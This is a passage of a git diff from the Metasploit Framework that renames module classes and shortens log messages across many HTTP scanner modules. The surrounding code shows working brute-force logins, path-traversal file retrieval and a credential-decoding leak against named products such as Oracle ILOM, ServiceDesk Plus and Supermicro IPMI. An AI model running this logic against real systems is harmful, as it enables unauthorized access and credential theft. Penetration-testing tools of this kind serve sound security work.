print_error("Failed to retrieve the file contents") end end diff --git a/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb b/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb index 844c503987..22a5fbd3ea 100644 --- a/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb +++ b/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -51,7 +51,7 @@ class Metasploit4 < Msf::Auxiliary md5 = Rex::Text.md5("SRS" + record + "SERVER").upcase message = md5 + record - print_status("#{peer} - Retrieving the file contents") + print_status("Retrieving the file contents") res = send_request_cgi( { @@ -66,9 +66,9 @@ class Metasploit4 < Msf::Auxiliary loot = res.body f = ::File.basename(datastore['RFILE']) path = store_loot('novell.filereporter.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE']) - print_status("#{peer} - #{datastore['RFILE']} saved in #{path}") + print_status("#{datastore['RFILE']} saved in #{path}") else - print_error("#{peer} - Failed to retrieve the file contents") + print_error("Failed to retrieve the file contents") end end diff --git a/modules/auxiliary/scanner/http/novell_mdm_creds.rb b/modules/auxiliary/scanner/http/novell_mdm_creds.rb index 3c03a14c2d..7008ed04f3 100644 --- a/modules/auxiliary/scanner/http/novell_mdm_creds.rb +++ b/modules/auxiliary/scanner/http/novell_mdm_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb b/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb index 49e1d33495..b7c4bbfa14 100644 --- a/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb +++ b/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner @@ -92,13 +92,13 @@ class Metasploit3 < Msf::Auxiliary 'headers' => { "Authorization" => "NTLM TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw=="} }) rescue OpenSSL::SSL::SSLError - vprint_error("#{peer} - SSL error") + vprint_error("SSL error") return rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError - vprint_error("#{peer} - Unable to Connect") + vprint_error("Unable to Connect") return rescue ::Timeout::Error, ::Errno::EPIPE - vprint_error("#{peer} - Timeout error") + vprint_error("Timeout error") return end diff --git a/modules/auxiliary/scanner/http/open_proxy.rb b/modules/auxiliary/scanner/http/open_proxy.rb index 123e89d6df..6ec76f75bb 100644 --- a/modules/auxiliary/scanner/http/open_proxy.rb +++ b/modules/auxiliary/scanner/http/open_proxy.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/openmind_messageos_login.rb b/modules/auxiliary/scanner/http/openmind_messageos_login.rb index f78d63b8c2..75520d32ff 100644 --- a/modules/auxiliary/scanner/http/openmind_messageos_login.rb +++ b/modules/auxiliary/scanner/http/openmind_messageos_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -41,7 +41,7 @@ class Metasploit3 < Msf::Auxiliary return end - print_status("#{peer} - Starting login brute force...") + print_status("Starting login brute force...") each_user_pass do |user, pass| do_login(user, pass) end @@ -59,15 +59,15 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return false end if (res and res.code == 302 and res.headers['Location'] and res.headers['Location'].include?("/provision/index.php")) - vprint_good("#{peer} - Running OpenMind Message-OS Provisioning portal...") + vprint_good("Running OpenMind Message-OS Provisioning portal...") return true else - vprint_error("#{peer} - Application is not OpenMind. Module will not continue.") + vprint_error("Application is not OpenMind. Module will not continue.") return false end end @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Auxiliary # def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}") begin res = send_request_cgi( { @@ -116,12 +116,12 @@ class Metasploit3 < Msf::Auxiliary } }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return :abort end if (res and res.code == 302 and res.headers['Location'].include?("frameset")) - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") report_cred( ip: rhost, port: rport, @@ -132,7 +132,7 @@ class Metasploit3 < Msf::Auxiliary ) return :next_user else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}") end end diff --git a/modules/auxiliary/scanner/http/options.rb b/modules/auxiliary/scanner/http/options.rb index 1839e47ddd..466c9b75c3 100644 --- a/modules/auxiliary/scanner/http/options.rb +++ b/modules/auxiliary/scanner/http/options.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb b/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb index fb87ec82e4..d2a1490cc7 100644 --- a/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb +++ b/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report @@ -53,25 +53,25 @@ class Metasploit3 < Msf::Auxiliary }) if res.nil? or res.body.empty? - vprint_error("#{peer} - No content retrieved") + vprint_error("No content retrieved") return end if res.code == 404 - vprint_error("#{peer} - File not found") + vprint_error("File not found") return end if res.code == 200 creds = "" - vprint_status("#{peer} - String received: #{res.body.to_s}") unless res.body.blank? + vprint_status("String received: #{res.body.to_s}") unless res.body.blank? res.body.to_s.split(",").each do|c| i = c.to_i ^ 0x50 creds += i.chr end - print_good("#{peer} - Credentials decoded: #{creds}") unless creds.empty? + print_good("Credentials decoded: #{creds}") unless creds.empty? end end diff --git a/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb b/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb index f536b5a39a..6a078da9a3 100644 --- a/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb +++ b/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/oracle_ilom_login.rb b/modules/auxiliary/scanner/http/oracle_ilom_login.rb index bc29b6d04c..de82331fa2 100644 --- a/modules/auxiliary/scanner/http/oracle_ilom_login.rb +++ b/modules/auxiliary/scanner/http/oracle_ilom_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary return end - print_status("#{peer} - Starting login brute force...") + print_status("Starting login brute force...") each_user_pass do |user, pass| do_login(user, pass) end @@ -57,15 +57,15 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return false end if (res and res.code == 200 and res.headers['Server'].include?("Oracle-ILOM-Web-Server") and res.body.include?("Integrated Lights Out Manager")) - vprint_good("#{peer} - Running Oracle Integrated Lights Out Manager portal...") + vprint_good("Running Oracle Integrated Lights Out Manager portal...") return true else - vprint_error("#{peer} - Application is not Oracle ILOM. Module will not continue.") + vprint_error("Application is not Oracle ILOM. Module will not continue.") return false end end @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Auxiliary # def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}") begin res = send_request_cgi( { @@ -117,12 +117,12 @@ class Metasploit3 < Msf::Auxiliary } }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return :abort end if (res and res.code == 200 and res.body.include?("/iPages/suntab.asp") and res.body.include?("SetWebSessionString")) - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") report_cred( ip: rhost, port: rport, @@ -133,7 +133,7 @@ class Metasploit3 < Msf::Auxiliary ) return :next_user else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}") end end diff --git a/modules/auxiliary/scanner/http/owa_iis_internal_ip.rb b/modules/auxiliary/scanner/http/owa_iis_internal_ip.rb index 542b5ef896..ea870025cb 100644 --- a/modules/auxiliary/scanner/http/owa_iis_internal_ip.rb +++ b/modules/auxiliary/scanner/http/owa_iis_internal_ip.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/owa_login.rb b/modules/auxiliary/scanner/http/owa_login.rb index b2393bbd3b..efc78770f1 100644 --- a/modules/auxiliary/scanner/http/owa_login.rb +++ b/modules/auxiliary/scanner/http/owa_login.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/ntlm/message' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute @@ -158,7 +158,7 @@ class Metasploit3 < Msf::Auxiliary 'Cookie' => 'PBack=0' } - if (datastore['SSL'].to_s.match(/^(t|y|1)/i)) + if datastore['SSL'] if action.name == "OWA_2013" data = 'destination=https://' << vhost << '/owa&flags=4&forcedownlevel=0&username=' << user << '&password=' << pass << '&isUtf8=1' else diff --git a/modules/auxiliary/scanner/http/pocketpad_login.rb b/modules/auxiliary/scanner/http/pocketpad_login.rb index 8aed527ef6..5c4700f54a 100644 --- a/modules/auxiliary/scanner/http/pocketpad_login.rb +++ b/modules/auxiliary/scanner/http/pocketpad_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary return end - print_status("#{peer} - Starting login bruteforce...") + print_status("Starting login bruteforce...") each_user_pass do |user, pass| do_login(user, pass) end @@ -50,15 +50,15 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return false end if res && res.code == 200 && res.headers['Server'] && res.headers['Server'].include?("Smeagol") && res.body.include?("PocketPAD") - vprint_good("#{peer} - Running PocketPAD application ...") + vprint_good("Running PocketPAD application ...") return true else - vprint_error("#{peer} - Application is not PocketPAD. Module will not continue.") + vprint_error("Application is not PocketPAD. Module will not continue.") return false end end @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Auxiliary # def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}") begin res = send_request_cgi( { @@ -107,12 +107,12 @@ class Metasploit3 < Msf::Auxiliary } }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return :abort end if (res && res.code == 200 && res.body.include?("Home Page") && res.headers['Server'] && res.headers['Server'].include?("Smeagol")) - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") report_cred( ip: rhost, port: rport, @@ -123,7 +123,7 @@ class Metasploit3 < Msf::Auxiliary ) return :next_user else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}") end end end diff --git a/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb b/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb index fea9b90324..8a219052e8 100644 --- a/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb +++ b/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/radware_appdirector_enum.rb b/modules/auxiliary/scanner/http/radware_appdirector_enum.rb index 8cf4fdc12f..bc84d5d8a6 100644 --- a/modules/auxiliary/scanner/http/radware_appdirector_enum.rb +++ b/modules/auxiliary/scanner/http/radware_appdirector_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary return end - print_status("#{peer} - Starting login brute force...") + print_status("Starting login brute force...") each_user_pass do |user, pass| do_login(user, pass) end @@ -63,15 +63,15 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - vprint_error("#{peer} - HTTP Connection Failed, Aborting") + vprint_error("HTTP Connection Failed, Aborting") return false end if (res and res.headers['Server'] and res.headers['Server'].include?("Radware-web-server")) - vprint_good("#{peer} - Running Radware portal...") + vprint_good("Running Radware portal...") return true else - vprint_error("#{peer} - Application is not Radware. Module will not continue.") + vprint_error("Application is not Radware. Module will not continue.") return false end end @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary # def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}") begin res = send_request_cgi( { @@ -116,12 +116,12 @@ class Metasploit3 < Msf::Auxiliary 'authorization' => basic_auth(user,pass) }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed, Aborting") + vprint_error("HTTP Connection Failed, Aborting") return :abort end if (res and res.code == 302 and res.headers['Location'].include?('redirectId')) - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") report_cred( ip: rhost, port: rport, @@ -132,7 +132,7 @@ class Metasploit3 < Msf::Auxiliary ) return :next_user else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}") end end diff --git a/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb b/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb index cb12852868..a156661b3a 100644 --- a/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb +++ b/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/rails_mass_assignment.rb b/modules/auxiliary/scanner/http/rails_mass_assignment.rb index 5bdbe7bed5..6016a75b8a 100644 --- a/modules/auxiliary/scanner/http/rails_mass_assignment.rb +++ b/modules/auxiliary/scanner/http/rails_mass_assignment.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' require 'uri' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanUniqueQuery diff --git a/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb b/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb index 3e6f52150b..c1dfa907e7 100644 --- a/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb +++ b/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/replace_ext.rb b/modules/auxiliary/scanner/http/replace_ext.rb index 3537b86519..c48ab07a08 100644 --- a/modules/auxiliary/scanner/http/replace_ext.rb +++ b/modules/auxiliary/scanner/http/replace_ext.rb @@ -9,7 +9,7 @@ require 'pathname' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanFile diff --git a/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb b/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb index a7ce79c852..4da2079121 100644 --- a/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb +++ b/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb index cb103e7da7..9bd3cc4909 100644 --- a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb +++ b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/rips_traversal.rb b/modules/auxiliary/scanner/http/rips_traversal.rb index 2cc3915992..fb1a847654 100644 --- a/modules/auxiliary/scanner/http/rips_traversal.rb +++ b/modules/auxiliary/scanner/http/rips_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient @@ -73,9 +73,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Nothing was downloaded") + print_error("Nothing was downloaded") end end end diff --git a/modules/auxiliary/scanner/http/robots_txt.rb b/modules/auxiliary/scanner/http/robots_txt.rb index 4d9933953b..e53d89e7de 100644 --- a/modules/auxiliary/scanner/http/robots_txt.rb +++ b/modules/auxiliary/scanner/http/robots_txt.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/s40_traversal.rb b/modules/auxiliary/scanner/http/s40_traversal.rb index 3cea0a550b..a4c42efdba 100644 --- a/modules/auxiliary/scanner/http/s40_traversal.rb +++ b/modules/auxiliary/scanner/http/s40_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner @@ -48,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary t = "/.." * datastore['DEPTH'] - vprint_status("#{peer} - Retrieving #{datastore['FILE']}") + vprint_status("Retrieving #{datastore['FILE']}") # No permission to access.log or proc/self/environ, so this is all we do :-/ uri = normalize_uri(uri, 'index.php') @@ -58,13 +58,13 @@ class Metasploit3 < Msf::Auxiliary }) if not res - vprint_error("#{peer} - Server timed out") + vprint_error("Server timed out") elsif res and res.body =~ /Error 404 requested page cannot be found/ - vprint_error("#{peer} - Either the file doesn't exist, or you don't have the permission to get it") + vprint_error("Either the file doesn't exist, or you don't have the permission to get it") else # We don't save the body by default, because there's also other junk in it. # But we still have a SAVE option just in case - print_good("#{peer} - #{datastore['FILE']} retrieved") + print_good("#{datastore['FILE']} retrieved") vprint_line(res.body) if datastore['SAVE'] @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary res.body, ::File.basename(datastore['FILE']) ) - print_good("#{peer} - File saved as: #{p}") + print_good("File saved as: #{p}") end end end diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb index f83d2b5033..ead59e4e57 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb index aef82de583..ddd41a24b6 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb index f56d659877..51b10cf29b 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb b/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb index 8e33ae7cea..930dd36d87 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/scraper.rb b/modules/auxiliary/scanner/http/scraper.rb index 817d830d11..4533882e40 100644 --- a/modules/auxiliary/scanner/http/scraper.rb +++ b/modules/auxiliary/scanner/http/scraper.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/sentry_cdu_enum.rb b/modules/auxiliary/scanner/http/sentry_cdu_enum.rb index 7567b73111..f5481de390 100644 --- a/modules/auxiliary/scanner/http/sentry_cdu_enum.rb +++ b/modules/auxiliary/scanner/http/sentry_cdu_enum.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb b/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb index f3f7d1d534..cd1f376ed9 100644 --- a/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb +++ b/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary filename = datastore['FILE'] filename = filename[1, filename.length] if filename =~ /^\// - vprint_status("#{peer} - Retrieving file #{datastore['FILE']}") + vprint_status("Retrieving file #{datastore['FILE']}") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "workorder", "FileDownload.jsp"), @@ -61,9 +61,9 @@ class Metasploit3 < Msf::Auxiliary # The "Loding domain list To login AD authentication or local Authentication" string is returned in the response on a fixed version (build 9111) if res && res.code == 200 if res.body =~ /The File was not found/ - vprint_error("#{peer} - Vulnerable server, but the file does not exist!") + vprint_error("Vulnerable server, but the file does not exist!") elsif res.body =~ /Loding domain list To login AD authentication or local Authentication/ - vprint_error("#{peer} - The installed version of ManageEngine ServiceDesk Plus is not vulnerable!") + vprint_error("The installed version of ManageEngine ServiceDesk Plus is not vulnerable!") else p = store_loot( 'manageengine.servicedeskplus', @@ -72,10 +72,10 @@ class Metasploit3 < Msf::Auxiliary res.body, filename ) - print_good("#{peer} - File saved in: #{p}") + print_good("File saved in: #{p}") end else - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") end end end diff --git a/modules/auxiliary/scanner/http/sevone_enum.rb b/modules/auxiliary/scanner/http/sevone_enum.rb index 9e8a38d6c5..2551a650e7 100644 --- a/modules/auxiliary/scanner/http/sevone_enum.rb +++ b/modules/auxiliary/scanner/http/sevone_enum.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/simple_webserver_traversal.rb b/modules/auxiliary/scanner/http/simple_webserver_traversal.rb index 19c37446a5..6e556b22b2 100644 --- a/modules/auxiliary/scanner/http/simple_webserver_traversal.rb +++ b/modules/auxiliary/scanner/http/simple_webserver_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb b/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb index 093251a16e..db3b4664b9 100644 --- a/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb +++ b/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary res.body.to_s, 'IPMIdevicedesc.xml' ) - print_good("#{peer} - Stored the device description XML in #{path}") + print_good("Stored the device description XML in #{path}") return true else return false @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) unless is_supermicro? - vprint_error("#{peer} - This does not appear to be a Supermicro IPMI controller") + vprint_error("This does not appear to be a Supermicro IPMI controller") return end @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Auxiliary next unless res unless res.code == 200 && res.body.length > 0 - vprint_status("#{peer} - Request for #{uri} resulted in #{res.code}") + vprint_status("Request for #{uri} resulted in #{res.code}") next end @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Auxiliary res.body.to_s, uri.split('/').last ) - print_good("#{peer} - Password data from #{uri} stored to #{path}") + print_good("Password data from #{uri} stored to #{path}") end end diff --git a/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb b/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb index 